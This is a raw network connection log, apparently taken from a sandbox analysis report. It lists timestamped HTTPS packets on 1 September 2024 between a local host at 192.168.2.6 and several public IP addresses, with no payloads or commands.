Sep 1, 2024 00:54:39.217392921 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.217408895 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.217415094 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.217474937 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.217505932 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.217535019 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.217561007 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.233668089 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.233774900 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.235446930 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.235467911 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.235549927 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.235557079 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.238194942 CEST	443	49734	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:39.238269091 CEST	443	49734	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:39.238363028 CEST	49734	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:39.240113020 CEST	49734	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:39.240132093 CEST	443	49734	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:39.250410080 CEST	49736	443	192.168.2.6	35.190.80.1
Sep 1, 2024 00:54:39.250457048 CEST	443	49736	35.190.80.1	192.168.2.6
Sep 1, 2024 00:54:39.250530005 CEST	49736	443	192.168.2.6	35.190.80.1
Sep 1, 2024 00:54:39.250847101 CEST	49736	443	192.168.2.6	35.190.80.1
Sep 1, 2024 00:54:39.250859022 CEST	443	49736	35.190.80.1	192.168.2.6
Sep 1, 2024 00:54:39.289216042 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.303608894 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.303622961 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.303643942 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.303678036 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.303689957 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.303699970 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.303720951 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.303750992 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.320744991 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.320785046 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.320823908 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.320831060 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.320883036 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.321841002 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.321866035 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.321928024 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.321934938 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.321965933 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.334619999 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.335011005 CEST	49735	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.335030079 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.335788965 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.335822105 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.335853100 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.335860968 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.335899115 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.336112976 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.336165905 CEST	49735	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.336599112 CEST	49735	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.336658001 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.337018967 CEST	49735	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.337024927 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.357301950 CEST	49737	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:39.357342958 CEST	443	49737	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:39.357589960 CEST	49737	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:39.358863115 CEST	49737	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:39.358877897 CEST	443	49737	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:39.370402098 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.370426893 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.370537996 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.370553970 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.381501913 CEST	49735	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.407396078 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.407417059 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.407455921 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.407469988 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.407499075 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.408435106 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.408453941 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.408474922 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.408504009 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.408509970 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.408521891 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.409378052 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.409395933 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.409436941 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.409440994 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.409476995 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.410442114 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.410463095 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.410522938 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.410527945 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.410556078 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.422430038 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.422454119 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.422517061 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.422524929 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.422538042 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.422586918 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.423146009 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.423160076 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.506140947 CEST	49738	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:39.506170988 CEST	443	49738	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:39.506278992 CEST	49738	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:39.509181023 CEST	49738	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:39.509195089 CEST	443	49738	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:39.547983885 CEST	49741	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.548017979 CEST	443	49741	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.548064947 CEST	49741	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.548322916 CEST	49741	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.548333883 CEST	443	49741	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.645560980 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.645582914 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.645591974 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.645603895 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.645625114 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.645651102 CEST	49735	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.645663023 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.645704985 CEST	49735	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.666122913 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.666191101 CEST	49735	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.668092012 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.668107986 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.668164968 CEST	49735	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.668171883 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.716979027 CEST	443	49736	35.190.80.1	192.168.2.6
Sep 1, 2024 00:54:39.717267036 CEST	49736	443	192.168.2.6	35.190.80.1
Sep 1, 2024 00:54:39.717293978 CEST	443	49736	35.190.80.1	192.168.2.6
Sep 1, 2024 00:54:39.718290091 CEST	443	49736	35.190.80.1	192.168.2.6
Sep 1, 2024 00:54:39.718364954 CEST	49736	443	192.168.2.6	35.190.80.1
Sep 1, 2024 00:54:39.718802929 CEST	49735	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.720041990 CEST	49736	443	192.168.2.6	35.190.80.1
Sep 1, 2024 00:54:39.720108986 CEST	443	49736	35.190.80.1	192.168.2.6
Sep 1, 2024 00:54:39.720479965 CEST	49736	443	192.168.2.6	35.190.80.1
Sep 1, 2024 00:54:39.720498085 CEST	443	49736	35.190.80.1	192.168.2.6
Sep 1, 2024 00:54:39.736227989 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.736238956 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.736268044 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.736294985 CEST	49735	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.736304998 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.736310959 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.736351967 CEST	49735	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.757358074 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.757389069 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.757431984 CEST	49735	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.757438898 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.757456064 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.757481098 CEST	49735	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.757503986 CEST	49735	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.784821987 CEST	49735	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.784853935 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.844818115 CEST	443	49736	35.190.80.1	192.168.2.6
Sep 1, 2024 00:54:39.844993114 CEST	49736	443	192.168.2.6	35.190.80.1
Sep 1, 2024 00:54:39.845678091 CEST	49736	443	192.168.2.6	35.190.80.1
Sep 1, 2024 00:54:39.845700026 CEST	443	49736	35.190.80.1	192.168.2.6
Sep 1, 2024 00:54:39.846755028 CEST	49742	443	192.168.2.6	35.190.80.1
Sep 1, 2024 00:54:39.846782923 CEST	443	49742	35.190.80.1	192.168.2.6
Sep 1, 2024 00:54:39.846978903 CEST	49742	443	192.168.2.6	35.190.80.1
Sep 1, 2024 00:54:39.847387075 CEST	49742	443	192.168.2.6	35.190.80.1
Sep 1, 2024 00:54:39.847398996 CEST	443	49742	35.190.80.1	192.168.2.6
Sep 1, 2024 00:54:40.145193100 CEST	443	49737	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:40.145267010 CEST	49737	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:40.150393009 CEST	49737	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:40.150413036 CEST	443	49737	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:40.150664091 CEST	443	49737	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:40.179712057 CEST	443	49738	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.190965891 CEST	49737	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:40.192533016 CEST	49738	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.192567110 CEST	443	49738	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.192682981 CEST	49737	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:40.192749023 CEST	49737	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:40.192763090 CEST	443	49737	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:40.192950964 CEST	49737	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:40.193697929 CEST	443	49738	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.193772078 CEST	49738	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.194829941 CEST	49738	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.194900990 CEST	443	49738	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.194977999 CEST	49738	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.236519098 CEST	443	49738	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.240499973 CEST	443	49737	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:40.266479969 CEST	443	49741	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:40.266760111 CEST	49741	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:40.266774893 CEST	443	49741	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:40.267858028 CEST	443	49741	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:40.267923117 CEST	49741	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:40.268497944 CEST	49741	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:40.268558979 CEST	443	49741	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:40.268650055 CEST	49741	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:40.312501907 CEST	443	49741	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:40.314294100 CEST	49741	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:40.314301014 CEST	443	49741	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:40.314332962 CEST	49738	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.314337969 CEST	443	49738	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.316605091 CEST	443	49738	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.316617012 CEST	443	49738	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.316634893 CEST	443	49738	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.316637993 CEST	443	49738	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.316639900 CEST	443	49738	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.316668034 CEST	49738	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.316677094 CEST	443	49738	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.316700935 CEST	49738	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.316704988 CEST	443	49738	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.316731930 CEST	49738	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.319737911 CEST	443	49742	35.190.80.1	192.168.2.6
Sep 1, 2024 00:54:40.319921970 CEST	49742	443	192.168.2.6	35.190.80.1
Sep 1, 2024 00:54:40.319946051 CEST	443	49742	35.190.80.1	192.168.2.6
Sep 1, 2024 00:54:40.320287943 CEST	443	49742	35.190.80.1	192.168.2.6
Sep 1, 2024 00:54:40.320619106 CEST	49742	443	192.168.2.6	35.190.80.1
Sep 1, 2024 00:54:40.320678949 CEST	443	49742	35.190.80.1	192.168.2.6
Sep 1, 2024 00:54:40.320744038 CEST	49742	443	192.168.2.6	35.190.80.1
Sep 1, 2024 00:54:40.362575054 CEST	49741	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:40.362828970 CEST	49742	443	192.168.2.6	35.190.80.1
Sep 1, 2024 00:54:40.362862110 CEST	443	49742	35.190.80.1	192.168.2.6
Sep 1, 2024 00:54:40.364382982 CEST	443	49737	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:40.364499092 CEST	443	49737	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:40.364608049 CEST	49737	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:40.364813089 CEST	49737	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:40.364831924 CEST	443	49737	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:40.402350903 CEST	443	49738	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.402410030 CEST	49738	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.402424097 CEST	443	49738	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.402520895 CEST	49738	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.402523994 CEST	443	49738	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.402802944 CEST	49738	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.402992010 CEST	49738	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.403006077 CEST	443	49738	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.411422014 CEST	49743	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.411449909 CEST	443	49743	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.411534071 CEST	49743	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.411773920 CEST	49743	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.411784887 CEST	443	49743	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.423346996 CEST	49744	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.423376083 CEST	443	49744	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.423526049 CEST	49744	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.423762083 CEST	49744	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.423774004 CEST	443	49744	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.451016903 CEST	443	49742	35.190.80.1	192.168.2.6
Sep 1, 2024 00:54:40.451102018 CEST	443	49742	35.190.80.1	192.168.2.6
Sep 1, 2024 00:54:40.451164961 CEST	49742	443	192.168.2.6	35.190.80.1
Sep 1, 2024 00:54:40.451272011 CEST	49742	443	192.168.2.6	35.190.80.1
Sep 1, 2024 00:54:40.451297045 CEST	443	49742	35.190.80.1	192.168.2.6
Sep 1, 2024 00:54:40.451313972 CEST	49742	443	192.168.2.6	35.190.80.1
Sep 1, 2024 00:54:40.451365948 CEST	49742	443	192.168.2.6	35.190.80.1
Sep 1, 2024 00:54:40.541260004 CEST	443	49741	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:40.541331053 CEST	443	49741	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:40.542107105 CEST	49741	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:40.549668074 CEST	49741	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:40.549684048 CEST	443	49741	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:40.730345011 CEST	49746	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.730385065 CEST	443	49746	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.730441093 CEST	49746	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.730779886 CEST	49747	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.730803967 CEST	443	49747	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.731013060 CEST	49747	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.734986067 CEST	49746	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.735002995 CEST	443	49746	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.736505985 CEST	49747	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.736516953 CEST	443	49747	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.737000942 CEST	49748	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.737023115 CEST	443	49748	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.737175941 CEST	49748	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.738137960 CEST	49748	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:40.738149881 CEST	443	49748	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:40.746021032 CEST	49749	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:40.746059895 CEST	443	49749	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:40.746126890 CEST	49749	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:40.746162891 CEST	49750	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:40.746175051 CEST	443	49750	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:40.746222973 CEST	49750	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:40.746328115 CEST	49751	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:40.746362925 CEST	443	49751	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:40.746412992 CEST	49751	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:40.746594906 CEST	49749	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:40.746609926 CEST	443	49749	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:40.746771097 CEST	49750	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:40.746787071 CEST	443	49750	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:40.746906042 CEST	49751	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:40.746922970 CEST	443	49751	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.148765087 CEST	443	49744	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.149120092 CEST	49744	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.149141073 CEST	443	49744	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.150110960 CEST	443	49744	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.150180101 CEST	49744	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.150566101 CEST	49744	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.150643110 CEST	443	49744	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.150811911 CEST	49744	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.150823116 CEST	443	49744	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.166184902 CEST	443	49743	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.166464090 CEST	49743	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.166492939 CEST	443	49743	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.167572021 CEST	443	49743	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.167638063 CEST	49743	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.168014050 CEST	49743	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.168073893 CEST	443	49743	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.168191910 CEST	49743	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.168200016 CEST	443	49743	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.205744982 CEST	49744	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.270143986 CEST	443	49744	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.270207882 CEST	443	49744	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.270272970 CEST	49744	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.271883011 CEST	49744	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.271895885 CEST	443	49744	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.294960976 CEST	49752	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:41.294992924 CEST	443	49752	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:41.295073986 CEST	49752	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:41.295289040 CEST	49752	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:41.295305014 CEST	443	49752	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:41.309798956 CEST	443	49743	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.309871912 CEST	49743	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.309897900 CEST	443	49743	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.310657024 CEST	443	49743	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.310725927 CEST	49743	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.311443090 CEST	49743	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.311456919 CEST	443	49743	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.324610949 CEST	49753	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:41.324645042 CEST	443	49753	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:41.324708939 CEST	49753	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:41.324947119 CEST	49753	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:41.324963093 CEST	443	49753	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:41.359966993 CEST	443	49748	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.360167027 CEST	49748	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.360183954 CEST	443	49748	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.361325026 CEST	443	49748	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.361397028 CEST	49748	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.361767054 CEST	49748	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.361867905 CEST	443	49748	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.361968040 CEST	49748	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.361974955 CEST	443	49748	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.405827045 CEST	49748	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.446897984 CEST	443	49746	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.447125912 CEST	49746	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.447143078 CEST	443	49746	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.448151112 CEST	443	49746	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.448225021 CEST	49746	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.448582888 CEST	49746	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.448630095 CEST	443	49746	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.448726892 CEST	49746	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.451239109 CEST	443	49751	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.451452017 CEST	49751	443	192.168.2.6	13.107.246.73
